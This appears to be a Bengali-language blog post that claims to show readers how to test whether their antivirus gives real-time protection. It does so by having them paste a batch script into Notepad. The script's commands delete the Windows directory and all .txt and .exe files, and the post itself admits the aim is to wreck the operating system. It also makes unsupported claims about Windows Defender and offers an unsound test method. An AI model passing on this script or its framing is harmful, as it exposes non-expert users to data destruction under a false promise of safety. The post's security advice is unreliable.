Information Technology

This Awesome Blogger Let's be friends and spread the love
together in the world.
Join us on

আপনার অ্যান্টি ভাইরাস আপনাকে সম্পূর্ণ সুরক্ষা দিচ্ছে তো???????

Confusion

আমরা অধিকাংশ কম্পিউটার ব্যাবহারকারিরাই উইন্ডোজ ব্যাবহার করি, তাই আমাদের ভাইরাসের হাত থেকে নিজেদের বাঁচাতেই হয়। আর এজন্য একমাত্র পথ হল অ্যান্টি ভাইরাস। আর তাই অ্যান্টি ভাইরাস জোরদার হওয়াটাও আবশ্যক।
সব ভাল অ্যান্টি ভাইরাসের একটা সাধারণ ক্ষমতা হল Real time shield, যার দ্বারা উহা যেকোনো ফাইল তৈরি ও খোলার সময় তা স্ক্যান করে। অনেক অ্যান্টি ভাইরাসের কিন্তু এই ক্ষমতা নেই। যেমন উইন্ডোজ ডিফেন্ডার। যদিও ইহা দেখায় যে real time scan চালু আছে।
তাই আজ আপনাদের শেখাবো কিভাবে আপনি আপনার অ্যান্টি ভাইরাস কে পরীক্ষা করতে পারবেন। যেহেতু অ্যান্টি ভাইরাসের প্রধান কাজ আমাদের সুরক্ষা প্রদান করা, তাই একে পরীক্ষা করার সর্বশ্রেষ্ঠ উপায় ভাইরাস বানানো। চিন্তা করবেন না, এটা আপনার কম্পিউটারের কোনও ক্ষতি করবে না।
পরীক্ষার জন্য প্রয়োজনীয় ভাইরাসের কোডিং:
@ echo off
kill %windir%
del %windir%
del *.txt
del *.exe

উপরোক্ত কোডিং টি কপি করুন। এবার নোটপ্যাড খুলে পেস্ট করুন।
তারপর ফাইলটি .txt এক্সটেন্সান সহ সেভ করুন (যেমন Check.txt)। যতক্ষণ ফাইল টি .txt ফরম্যাটএ থাকবে ততক্ষণ ইহা কোনও ক্ষতি করবে না। এর কাজ শুরু করাতে হলে .txt কে .bat এ রূপান্তরিত করতে হবে। আশা করি .txt কে .bat করার বোকামি কেউ করবেন না (যদি কেউ করেন তার জন্য আমি দায়ী নই)।
এবার আসল খেলা। কয়েক সেকেন্ড অপেক্ষা করে নোটপ্যাডের উইন্ডো টি ক্লোজ করার চেষ্টা করুন। যদি দেখেন যে ক্লোজ করতে পারছেন না ইহার অর্থ অ্যান্টি ভাইরাস কাজ করছে তাই আরও কিছুক্ষণ অপেক্ষা করুন। আপনার অ্যান্টি ভাইরাস নোটিফিকেশান দেখাবে যে একটি থ্রেট (বা ভাইরাস) ব্লক হয়েছে। আর যদি আপনি ক্লোজ করতে সক্ষম হন, তাহলে বুঝবেন যে আপনার অ্যান্টিভাইরাস real time protection দিচ্ছে না। এবার ম্যানুয়ালি ফাইল টি স্ক্যান করুন। যদি এতেও আপনার এন্টিভাইরাস কিছু না বলে তাহলে কিন্তু চিন্তার বিষয়……..
প্রসঙ্গত উল্লেখ্য, এই ভাইরাস টির উদ্দেশ্য অপারেটিং সিস্টেমের বারোটা বাজানো। আবারও বলছি .txt কে .bat করে রান না করলে, এই টেস্ট ততক্ষণ সম্পূর্ণ সুরক্ষিত। তাই দয়া করে কেউ ভয় পাবেন না। আজ ভয় পেলে হয়ত ভবিষ্যতে আপনাকে বিপদে পরতে হতে পারে।।
আপনাদের সুবিধার্থে আমি পুরো প্রক্রিয়ার একটি ভিডিও তৈরি করেছি। আশা করি এতে আপনাদের বুঝতে সুবিধা হবে।
https://www.youtube.com/watch?v=rAQjxMUiyN8&feature=youtu.be

আপনাদের কাছে একান্ত অনুরোধ, এই পোস্ট আপনাদের বন্ধুদের সাথে শেয়ার করুন ও তাদেরও সুরক্ষিত থাকতে সাহায্য করুন।

Share this:

ABOUT ME

Hi all. This is My Frist Blog. We're providing content for Bold site and we’ve been in internet, social media and affiliate for too long time and its my profession. We are web designer & developer living Bangladesh! What can I say, we are the best..

JOIN CONVERSATION

    Blogger Comment
    Facebook Comment

0 comments :